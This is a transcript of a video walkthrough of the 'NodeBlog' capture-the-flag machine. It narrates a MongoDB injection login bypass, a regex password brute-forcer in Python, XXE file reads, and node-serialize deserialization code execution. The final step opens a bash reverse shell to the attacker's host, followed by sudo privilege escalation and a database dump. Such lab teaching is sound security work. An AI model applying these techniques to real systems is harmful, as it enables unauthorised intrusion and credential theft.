What's going on YouTube? This is IPSec, and we're doing NodeBlog, which is a machine I created for the UHC December qualifiers, and as the machine's name suggests, it is a blog written in Node.js using the Express framework. The main thing I wanted to highlight in this box was NoSQL or MongoDB injection because a lot of people or automated scanners will miss this type of vulnerability for whatever reason. So I wanted to highlight that, but a box isn't just one vulnerability, I had to chain a few together. So once we bypass the login parameters with that MongoDB injection, we can upload blog post in the form of XML. So there's XML any injection there that can leak the source code to the web application. And with that source code, you see the application uses a library Node-Serialize, which is vulnerable to deserialization. And we can do that to get code execution on the box. What's on the box? We just use the password for the web user to SUDO root, but it's not so easy because it's not in an SQL database, so I imagine a lot of people will have trouble finding it. With that being said, let's jump in. As always, we can begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it NodeBlog, and then the IP address, which is 10.129.96.160. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 5000, and it's running Node.js, specifically the Express framework, which is just a framework for Node. Think of it like Flask or Django for Python, Laravel or Cake PHP for PHP. Every language has its own framework, like Elixir is for Erlang, but you can go on for hours there. So let's just go take a look at the website. So 10.129.96.160, port 5000, and we just get a simple blog. We can click on the first post that says UHC qualifiers, which is what this box was created for, and it gives links to a bunch of their media information. We can look at my first Node app that just gives a little background of this application. I had created it after watching the tutorial here, and I put a lot of the vulnerabilities that I first discovered when doing the Sans Holiday Hack 2015. So if you wanted to look at more vulnerabilities, you got stuck and didn't want to use this video, you could always go there to kind of get an idea of what to do. There's not much we can do here. We look at articles, and it's not giving us like a unique identifier. If I saw like index.php post equals 1, I would try some type of SQL injection there. But we have some pretty search engine optimized friendly URLs, so it's kind of hard to do SQL injection in this. We can try going to the login and logging in with, let's say, admin, and we get invalid password. So we can try like admin password, still invalid. It is telling us invalid password specifically, so let's try something that probably doesn't exist, like please subscribe, input password, and we get invalid username. So right off the bat, we have the first vulnerability in this application, and that's the ability to enumerate usernames. You can try this with all fields, like forgot password is a common one nowadays, but we can try logging in with some basic SQL injection, so like or 1 equals 1. And we get invalid password. Another place I do it is probably in this username field, because when I do admin password here, we get invalid password. So I could try admin and then a quote or a comment, and we get invalid username. So we know it did not process this comment. So it's a quick way we can test for SQL injection, but this is Node.js, and a lot of Node.js applications don't use SQL. PHP is common with the LAMP stack, but for Node.js, it is all about the main stack. That is MongoDB, then Express, Angular, and Node.js, I believe. So MongoDB is a NoSQL-like database, and it's still vulnerable to injection. It's just slightly different. You got to combine it with like a type confusion vulnerability. So to do that, let's go over into Burp Suite, and I'm going to try logging in with admin. And let's see, Burp Suite was set to not intercept, so let's try this again. Admin. It's over on Burp. We can send this over to the repeater tab. And one of the tricky things with this is you got to do type confusion, and a lot of times you can't do it in this XWW form URL encoded. So it would be something like this, not equals to admin, and we still get invalid password. What we're doing here is transforming this query to say where the username is admin and the password is not equal to admin. But a lot of the web servers just don't really allow you to put scalars or arrays, whatever this is, in the URL form. However, this is Node.js, and we can convert this quickly to be JavaScript, or JSON, not JavaScript. And then all we have to do is change how this parameter works to make it JSON. So user is equal to admin, and then password is equal to admin like this. And then when we send this, we do have an error message because, let's see, where did I screw up? User colon, oh, I don't have this. But we could read this error message. We'll get more into this later. This is also really good for attackers because we know where the application actually is running in some example files, but we'll look at that later on in this video. So fixing up the JSON, if I forgot the quote, we can see invalid password. If I put something that doesn't exist, we get invalid username, so we know this is working as intended. So let's try this type confusion vulnerability again, and for the password, I'm going to put more JSON, and we're going to say not equals to admin. And let's see, we forgot to terminate this JSON object. And we have something different now. We don't have invalid password, and it's giving us a cookie to set. So we have successfully logged into this application by saying username equals admin and the password is not equal to admin. There's other things we can do within Node.js, or MongoDB, not Node.js. One of them being regex. So instead of this not equals, we can change it to regex, and we could say is equal to anything, .star, and we still log in. If we put something bad here, like ASDF, because that's not the password, we get invalid password. If you want to know more about that, I would just recommend looking at like MongoDB, search for NE, if we actually Google it. And you go to the MongoDB man pages, and then you can click on like operators or let's see, this query and projection operators. And we see all of these that we can do. So we can do like equals, greater than or equal to. So this would be good if you're like converting each character into its hex number, because then you can do greater than, less than, and speed up brute forcing. You got logical operators like and, not, nor, or. Let's see, evaluation. This is the regex one we are using. So you can look up all the little operators you could use, but really not equals and regex are the two most popular, because with not equals, you can just log into the application. But if you actually want to get the password, regex is where it's at, because now we can do begins with something and then brute force a bunch of characters. And when this is true, it will log us in. So let's build a quick Python application to do this. I'm going to call this login.py, I guess. And we're going to want to import requests. And let's see. First, we just want to make sure we get a request working. So I'm going to do def login pw. And then for this, we need to do some nested JSON. So I'm going to put, we'll call this payload is equal to. And normally I'd use like an F string or format string, whatever it's called, but I'm not going to do that because I'm putting raw JSON here, and then which requires using these brackets, which is going to screw with this F string. So let's do, is it regex colon, and we just want something that matches everything. Actually, this is a function, so I'm just going to do %s. And what that's going to allow me to do is % here and pw, and it's going to put pw in this %s. So let's just try this real quick. Return payload, and we can say, let's see, login ipsec. And then Python 3, login.py. Let's see, we should probably print that. There we go. So now we have successfully put something into this. So now what's next is building the rest of this request. So data is going to equal, and we can just put this as JSON. So is it user or username? User. User is equal to admin, and then password is equal to payload. And then let's return data. And the one thing I can spot right off the bat is Python is putting quotes around our JSON. So if we went here and we put quotes around this, it's gonna error because it doesn't like something. So we don't want quotes around that. So what we can do with that is import JSON. And then this payload, we can just say json.loads and tell it you are not a string. So now when I print this, we don't have the single quotes before this. We can see the single quote there. It's not there. So that is probably one of the key things here. So now we just have to do the request. So r is equal to request.post and the URL HTTP. Let's grab and paste this. I have HTTP twice. There we go. And then instead of data is equal to data, I'm going to do JSON is equal to data. And that's going to tell Python to use this as JSON and automatically sets that header for us, so we don't have to do that. And then we can say if and look for invalid password. So here it is. If invalid password, I probably don't need all those spaces or tabs. In response.text, return false, and then we can return true here. I could have put that in an else statement, but if I did that, I'd have this weird if clause, and just my personal habit, I hate like the function not always returning. Like maybe there's some super weird edge case where this if, I don't know. I just normally don't use else if it's at this very end. Because if the function isn't invalid password, I want to return true. I don't know. That may be a personal thing. Hopefully that makes sense why I didn't use the else there. Or it's not overly confusing why I didn't, but yeah. So we can say if login ipsec. We can put do dot star because this should return true. Print success. So when I run this, it's gonna hang. That's not right. Let's see. Request.post 10 129 96 160 5000 /login. Let's see, login test. It should just do nothing. I wonder where it's hanging. Is my VPN down? No, I can get to it. 10 129 96 160. Let's see. http:// 10 129 96 160. This is weird. We can say proxies is equal to http and then http 127.0.0.1, and we'll send this over to Burp Suite. So proxies equal to proxies. Let's go to Burp Suite, reset intercept, run this again. And I forgot to do port 8080. Okay, we are in here. And it is indeed hanging. but it's not hanging here. User agent. Do I need the referral? Can't imagine I need that. Let's see. User admin, password. Oh, I have a Q, not a G. That actually hung it? Wow. Let's see. What is this? Regex. I don't know how I made that typo, but at least we have some debugging in here to see exactly how I go about this if I make an error. But that looks better. We got invalid password. So we can take this proxy off because we don't want it to keep slowing us down. So we run this. We don't have success. But if I change this to .star, now we have a success because it did not find invalid password. So with this, now we can create a brute forcing loop. So let's go up to the top, and I'm going to import string. And I'm also going to import sys because you'll see this allows me to do something very just like visually appealing. But the string is going to easily let me loop through all characters. So let's just show real quick, Python 3, import string, and I can do print string dot ASCII letters, and it just puts all the letters here. So let's do a loop here. So while stop is equal to false, and we just want to make stop equal to false to begin with. And I also want to set password is equal to caret, because in regular expression this means starts with. So I always want to make sure when I'm brute forcing this password that I'm at the very beginning of the string. So that's why I do this. The reason for this loop is because I want to brute force each character, and this is just a lazy way to do it. This is all going to be really bad code, so you should probably clean it up yourself, but as long as it works, it's good. So for I in string.ASCII letters. And then for here, we're going to do a sys standard out.write. And I'm going to start it with a line break because this is going to essentially do a flush, I believe. And then we can say password and then I. So what this is going to do is print out the password that we're going to attempt. And we're going to attempt starts with right now and then a letter. So if login, and we can do the same thing, password I, then we have successfully logged in. So what I'm going to do is say password is equal to plus equals to I, which is going to append that letter to password, and then break. And this should start working. We probably want to no, we don't have to flush or anything. This will work, but I think it has a few issues. The first one being bad syntax. So this, we just need to do F like that. And we'll see if it gets the first two characters. And once it gets the first two characters, we'll move on and clean it up. So the very first one is I, the second one is P, so we can see it is indeed working. But the issue is it's never going to stop. Once it hits that final character, it's just going to go into a forever loop. So what I want to do is upon a success, I'm going to do a second login. So if login, we just want to do password because we've already appended it. And then we do a $, which in regular expressions is end of string. So if that, then we can do sys standard out dot write the password like that. We can flush. I don't know if we have to flush because we're putting the line break at the end, but just have it. And then break, and we also want to say stop is equal to true. So this should work. Let's see. Actually, let's do Python 3 login.py. So you can see it working, and while it goes, we will just explain it before I speed up the video. So right here, we're just doing our login thing to brute force. Here, we're setting password is equal to the start of the string. This is going to be a forever loop. We tell it to stop when we want to. And then here, we're looping through every ASCII character. If I was doing this, I would also combine like ASCII symbols and things like that. But I have the power of foresight here and know the password didn't have any symbols. So that's why I just left it ASCII letters so it says, so it stays pretty quick. This is just printing it out, and we're doing sys standard out write, so we can make it do this little graphic thing instead of just printing a bunch of lines. I think it looks pretty cool, and you know it's working. If it hangs, you know it's hung. Here, we're just testing the login by trying password and then whatever character we are on in this ASCII letters loop. If it's success, then we append that letter to the password and test it again with the $, because that's going to say the string ends with that. And then if it does, we're just going to end the program. And we set stop equals to true, so hopefully the program stops. And I noticed I had a bug here. It's doing what I said it would do. It's just continuously loop at the end. And there could be a symbol here that's just not in our word list. But what's actually happening is when I converted this to be an F string, I did not do that. So this was actually every time it got a successful hit, it actually tried logging in with password, like the word, not the variable. So that was that bug. I'm going to run this again. We're going to speed up the video to get to the end so you can see it does work as intended, or so I can see it does work as intended. So be right back. And there you have it. The password is ipsec says please subscribe. So now we can log into this application two different ways. We could either just do the bypass. So if I go here, burp suite, we go to proxy, attempt to log in. You can send it over to repeater, and see, that was probably the bad one. Forget what was wrong with it. Let's see. Here. This is the payload we want. Oh, it was regex with a Q. I don't know how I did that. But we could log in with this and say it's not equal, not regex, and do JSON. And I think this will work. Yep, so we're logged in. We have some more features. We can also delete our cookie and log in with just the password. So go back here, log in, and we can say admin and ipsec says please subscribe and log in that way. So two different ways to log in. Now we have the ability to edit articles. So we could potentially edit this or delete. We also have this upload functionality. So if I click on upload, let's just create a test file. So this is Node.js, not PHP. So that's why I'm not going to try a PHP web shell. I'm just going to do test.txt and put stuff in here. So let's go here. So let's do HTTP, UHC. That was NodeBlog here, or UHC NodeBlog. There we go. So we can try uploading test.txt, and we don't really get anything, but this is the application erroring out and telling us what the example format is. So this is a XML upload form. So it's just giving us test XML. So what happens if we uploaded a XML document? So let's do test.xml, put in their example, and then let's just go back, upload, let's see, log in. I don't know if I should have logged in again. Let's click upload, there we go. There's some weird caching issue there, I think, but test.xml, and it starts creating the article for us. And we can save it, and I think it saves. Maybe it doesn't. I'm guessing the save article is broken. But the key thing is it's putting data from that XML form. So let's actually try putting XML any injection here. So what I'm going to do is payload all the things, then XXE. I'm going to search for a good payload. I always just go to payload all the things because, I mean, this is the place I like best for finding proof of concept scripts. And all we do is let's copy this. Let's see. I was hoping to find this first. For doing XXE, I always like not using files first because if something like AppArmor is installed, it's a potential that it blocks us from accessing /etc. So I like doing just the basic vanilla payload without any funny business. So we can do, whoops, that. And example, I'm going to call this please subscribe. And we'll put it in the description because description is probably the biggest field. And all we do is and replace semicolon, I think. If I look at this post again, yep, and variable semicolon. So let's try uploading this XML file. So I'm going to go back to the blog. Let's go back, upload. I don't know why it's doing that. I probably should fix this. I think I fixed this bug on UHC, but UHC is on AWS. HackTheBox is on vCenter. I think I forgot to patch this bug fix back to this box. But we can upload test.xml. And it did not work. Let's see if I hit 5,000, not login. There we go. So let's see. Maybe this has to be one line. And it was description. So upload this. Look at the source. And the fact that it's outputting the example, we have some type of error. So I'm going to try getting rid of this header, and we'll just start with this doc type and see what happens with this. Let's see, doc type. That's closed. Okay, let's try this one. So let's go back here, 5,000, upload XML, and it's still erroring out. So what I'm going to do is the crazy thing. I'm going to complicate the payload. Oh, wait. It's example, not replace. Shoot. Let's put this back. And entity example. So let's try example here. Go back, upload. There we go. So that was it. If I go here, upload test.xml, we have description as please subscribe. So I was just screwing up with my XML any injection. I read replace and put replace here when the ND is actually example. Okay, So now we confirmed it is XML ending injections. We can go with the more complicated route, and that is just putting a file. So let's go here, delete all of this, paste this in, and it's entity test. So let's make sure we put test here. And the weird thing is, like, my browser, it's remembering I selected this test.xml and automatically putting it in. So maybe it wasn't a bug in the web application. It was just my browser doing something weird with caching. If I refresh this page and then click upload, it'll ask again. So we can see it is now giving us the XXE POC file. Now, remember back a while ago, we had induced an error message by putting in bad JSON here or something. So let's just do that again, and we can see unexpected token. And it's telling us the application is in opt-blog. Now, here we have to guess what the actual main file is, and generally it's going to be like app.js, server.js, main.js. It's normally those three. If you went back and viewed this blog post and watched the video, you'll know it's server.js. But for that, it's a very light brute force of file names. But generally speaking, there'll always be one of those three. So opt, blog, server.js. And for a lot of like Node.js applications, they like using server.js. For a lot of Python, they like using app.py. It's just all up to the developer. But now we have updated test.xml, and we have the source code to server.js. So I'm going to make dir src. We'll go in here and do v server.js and paste it. And looking at all the imports, which are these things, we can see it's using this Node-Serialize module, which doesn't look that bad. If we just go Google Node-Serialize, we can go to npm, which is its package manager. We'll probably have to disable burp suite. And it will just tell us it's just a module that does serialization. I want to say somewhere it gives us a warning. If we go to versions, we can see version 004. In the last 7 days, it's been downloaded 421 times. We can look at just the graph of how common this is. But if we go back a few pages, let's see, Node-Serialize. Here we go. This one on SNCC, or however you pronounce that. My browser is freezing, not wanting to click. There we go. We can see it has a code execution path. So if we can see where this serialize module is being used, and we pass it this nd function parameter, we can actually get it to execute code. So let's take a look at where serialize is used. So I'm just going to do a search on serialize. So I'm going to get out of visual mode. There we go. And we can see this function authenticated. It's serializing the cookie. So probably should have used the json.parse. The secure way to do this would be probably c is equal to json.parse, and then I'm guessing json.stringify c. I think this would do pretty much the same thing this Node's unserialized module is doing. And I just say JSON because if we look at the cookie, let's see. Do I have a cookie? Here. We can see this cookie is indeed JSON. Go to decoder, smart decode. There we go. So we have user, admin, sign, and then a hash. If we looked at the source, we can see the hash is literally just combining the cookie secret, which is up at near the top, and the username, and creating an MD5 sum. So UHC-secret cookie. So all it's doing is echo-n UHC secret cookie. I think that's how I typed it. Admin MD5 sum. We can see 23E11. And here we have 23E11. So that's how it's actually making the cookie secret. I did not save. Let's go back to the application. Copy. Paste. There we go. So I missed what I edited here, but you had the json.parse. So all we have to do is put the deserialization function in the cookie, and we should have code execution. So let's do that. Let's go back to the proxy or repeater. Let's just do a new request on slash, and we'll send this over to Burp Suite. Make sure Burp Suite isn't intercepting anything, and intercept is on. Send this request, go to repeater, and all we want to do is change this cookie. The first thing we're going to do is URL encode this to see if it still works. It does, and that just saves us a step. And I'm just going to put it, we can put it anywhere actually, right? We don't have to put it in the username. We can just also do it here. Call it please subscribe. It doesn't really matter what it's called. And all we do is put this payload here. So let's copy this. Let's see. Where do I want to copy from? I just want to copy probably this, right? ND func up until that single quote, double quote. There we go. So we have this, and we can try a sleep. I always like doing sleep first. So this is doing an ls on slash. So I'm going to do sleep 5. And if this takes 5 seconds to load, we'll be good. If it never comes back to us, I'm going to guess we have some type of syntax error. And I'm going towards the syntax error route now because we're stuck on this waiting thing. So I'm just going to try changing these quotes to be double quotes to see if that fixes it. We are already escaping them, so we don't have to really worry about that. And still have an error. Let's see. So we have user sign, comma, then please subscribe. Where is our error message? I don't like that Burp Suite is changing this highlighting, but I guess that's the semicolon right here. So what I'm going to try doing, we'll get rid of this, send, and it works without the serialization. So instead of sleep 1, I'm just going to do, we can try netcat, 10, 10, 14, 8, port 9001, and see if it connects back to us. And it does not. So we have some type of error that we just don't know. Try putting these back to single quotes. Come on. Send it again. Still not working. The other thing I could try is URL encoding this whole thing. So convert selection, URL encode. I'm just going to do all characters. Send. And we don't. Let's do Control-Shift-U to un-URL encode. And we can try changing those quotes yet again. And seeing if it works. Let's do URL encode. This entire thing. URL, all characters. It comes back, and we get a connection. So that is good. I'm going to try this sleep again real quick. So let's try sleep 1 and encode this whole payload. So convert selection, URL, all characters, and it's not sleeping. So this request is going off in the background. So it's not waiting for it to end. So this is why sleep here just does not work. I'm sure there's other like payloads we could do that doesn't background this request, and then sleep would then be a good way to do it. But for this payload, I think it's doing it asynchronously, so sleep does not. I hate when burp does that. One of the previous requests finished and it rewrote my output. So let's just do this, URL encode it. So we definitely want double quotes, and we can put a bash one-liner here. So I'm just going to put text there, and let's create a bash one-liner. So echo-n bash-i this dev tcp 10.10.14.8 9001 0 and 1 base 64. And when I do this in web requests, since I know URL encoding is going to be a pain, I'm going to get rid of that plus. So I'm going to guess the plus is after this I. I'm just going to put a space, and it changes that slightly. We have another plus right here. I'm going to guess that's before this O. And let's see. That is good. I could have swore I would have to do something different, but maybe not. Let's just test this payload real quick. NC-LVNP 9001. And all we do is echo-n base 64-d, pipe it over to bash. And it looks like it works. So, huzzah. Let's copy. And Burp Suite did this again. How annoying. We can paste that. And the reason why I didn't do this like bash payload straight off, and I put it in this base 64 web cradle thing, is because it has so many bad characters, and base 64 removed a lot of them. I think this is not going to work because Burp Suite went ahead and put single quotes back. Let's see. Yeah. So let's change these back to double quotes. This, and then where's that last one? Here. There we go. Copy this whole payload, convert selection URL, encode all characters. We are still listening. Send it, and we get a shell. Awesome. So I'm going to do python 3-c import pty.spawn bin bash control Z stty raw minus echo fg, hit enter twice, and now we have like tab autocomplete and things like that. We notice that we are the admin user, and if you remember back at the start of the video, we had got admin's password. So let's just try sudo-l. It wants the password for admin, which is ipsec says, please subscribe. And we can see we can run sudo, and it's just a simple privesc like that. Now, if you did not dump the password and you just went through this box with that not equals to, this could be a bit tougher. There is a utility called Mongodump that we can use, and that should be able to dump the database. So let's try playing with that. The first thing I want to do is catserver.js, and we want to do localhost blog. So copy this, and then let's just go dev shm mongodump. Do I have it on the box? I do. Oh, we don't even need to know anything. I can just literally run mongodump as admin, and then we go to blog, and we have articles.bson. If I cat articles.bson, we can see the file. If I cat users.bson, we can see username admin password, IPsec says please subscribe. There's got to be a way to view BSON files. I don't know exactly what that is. This is the metadata for it. I was just saying exactly what it said. But let's see. View BSON file, Google, disable burp. Let's see, MongoDB, BSON dump. Hey, I have it on this box. Users.bson. There we go. So this dumps it in a format that we can read. If I had JQ on this box, we could further make that pretty. So echo-n. Let's put it in single quotes. And then JQ dot. And we can get it in this format. So that's the other way we could have got this password. If we want to do something more tough, articles.bson, actually, bson dump, articles, copy this. I don't know how this one's going to work. Let's see, bson dump, base64-w0, and we'll copy all this text to objects found. Okay. V articles.bson.b64. Paste. base64-d jq dot. And there we go. So a more pretty version of dumping the articles. So apologies for the sloppy cut. After recording the video, I realized there was one more thing I wanted to show, and that is IDOR vulnerabilities are rampant in this application. That's insecure direct object reference, and it's something a lot of pen testers I think miss because they find all the vulnerabilities but don't find exactly how easy they are to trigger. For example, in this application, we have this upload piece, and this was locked behind a login. However, if we looked at that, all that upload piece was, let's see, is a post to articles XML, right? And all we know is we logged in and we see this button. So I would generally test either by, in Burp Suite, doing this, putting it in repeater and just removing the authentication. So this is getting the etc passwd. If I remove the cookie, it still works. And we can get the XXE. So we didn't even need authentication to do this. If we were just brute forcing endpoints, we may stumble across the XML under articles and be able to do it that way. Pretty much everything in the application is accessible without authentication. The only piece it uses authentication for is display. So if I go to this edit thing and we try editing, let's do please subscribe. I'm not sure if it can edit any of the default posts. I know I had prevented that, but I'm not sure in this version if I did. So it looks like we can edit this. So what I'm going to do, go to this edit page. Let's remove the cookie. So I'm just going to delete this. We refresh this page. We're still here, and we can say I did this without auth. We save it, go back to all articles, and we can see we did it without any type of authentication. So IDOR vulnerabilities is something you should definitely be testing for, just because sometimes developers are lazy, especially me, and we just wrap authentication, around the actual display component. So with that being said, I'm going to conclude this video. Hope you guys enjoyed it. Take care, and I will see you all next week.